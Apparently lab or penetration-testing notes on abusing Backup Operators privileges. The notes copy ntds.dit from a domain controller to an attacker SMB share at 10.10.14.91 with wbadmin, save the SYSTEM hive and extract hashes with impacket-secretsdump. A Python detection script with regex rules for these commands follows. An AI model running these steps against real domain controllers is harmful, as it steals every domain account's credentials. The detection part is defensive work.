Backup Operator SeBackupPrivilege dump ntds.dit

Dump NTDS from DC

echo y | wbadmin start backup -backuptarget:\\10.10.14.91\share -include:c:\windows\ntds

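Create 2 GB NTFS partition

dd if=/dev/zero of=ntfs.disk bs=1024M count=2
losetup -fP --show ntfs.disk   # prints the allocated loop device; /dev/loop0 is assumed below
mkfs.ntfs /dev/loop0
mkdir -p /tmp/share            # the mount point must exist before mounting
mount /dev/loop0 /tmp/share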

Configure samba

![[Pasted image 20240423153016.png]]

mkdir -p /tmp/share
chmod 777 /tmp/share
sudo systemctl restart smbd

Backup to samba

echo y | wbadmin start backup -backuptarget:\\10.10.14.91\share -include:c:\windows\ntds

Get Version

wbadmin get versions

Recover the ntds.dit file to a readable location on the DC

echo y | wbadmin start recovery -version:???? -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:c:\ -notrestoreacl

Get SYSTEM hive

cmd /c reg save HKLM\SYSTEM system.hiv

Download both and extract hashes

impacket-secretsdump -ntds ntds.dit -system system.hiv -history LOCAL
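
Detection side: the command lines in the steps above are distinctive in process-creation logs (Security event 4688 with command-line auditing, or Sysmon event 1). The sketch below is an added example, not part of the original notes; the host name, account names, version string and sample events are constructed.

```python
import re

# (stage name, pattern) pairs matched case-insensitively against a process command line.
RULES = [
    ("reg save of SYSTEM hive",
     re.compile(r"\breg(\.exe)?\s+save\s+(hklm|hkey_local_machine)\\system\b", re.I)),
    ("wbadmin backup of NTDS directory to UNC target",
     re.compile(r"wbadmin(\.exe)?\s+start\s+backup\b(?=.*-backuptarget:\\\\)"
                r"(?=.*-include:\S*\\windows\\ntds)", re.I)),
    ("wbadmin recovery of ntds.dit without ACLs",
     re.compile(r"wbadmin(\.exe)?\s+start\s+recovery\b(?=.*ntds\.dit)"
                r"(?=.*-notrestoreacl)", re.I)),
]

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, pat in RULES if pat.search(cmdline)]

def triage(events):
    """Group matched stages by (host, user); several stages from one
    account on a DC is a much stronger signal than a single hit."""
    hits = {}
    for ev in events:
        for name in classify(ev["cmdline"]):
            hits.setdefault((ev["host"], ev["user"]), set()).add(name)
    return {key: sorted(stages) for key, stages in hits.items()}

# Constructed sample events (host, users and version string are made up).
SAMPLE = [
    {"host": "DC01", "user": "svc_backup", "cmdline":
     r"wbadmin start backup -backuptarget:\\10.10.14.91\share -include:c:\windows\ntds"},
    {"host": "DC01", "user": "svc_backup", "cmdline":
     r"wbadmin start recovery -version:01/01/2024-00:00 -itemtype:file "
     r"-items:C:\windows\ntds\ntds.dit -recoverytarget:c:\ -notrestoreacl"},
    {"host": "DC01", "user": "svc_backup", "cmdline":
     r"cmd /c reg save HKLM\SYSTEM system.hiv"},
    # Benign look-alikes that must not match.
    {"host": "DC01", "user": "admin1", "cmdline":
     r"wbadmin start backup -backuptarget:E: -include:C:\Users"},
    {"host": "WS07", "user": "alice", "cmdline":
     r"reg save HKCU\Software out.hiv"},
]

if __name__ == "__main__":
    for (host, user), stages in triage(SAMPLE).items():
        print(f"{host} {user}: {len(stages)} stage(s): {', '.join(stages)}")
```

Accounts that legitimately run scheduled backups will match the first wbadmin rule, so alert on the combination of stages or on an unexpected backup target rather than on a single hit.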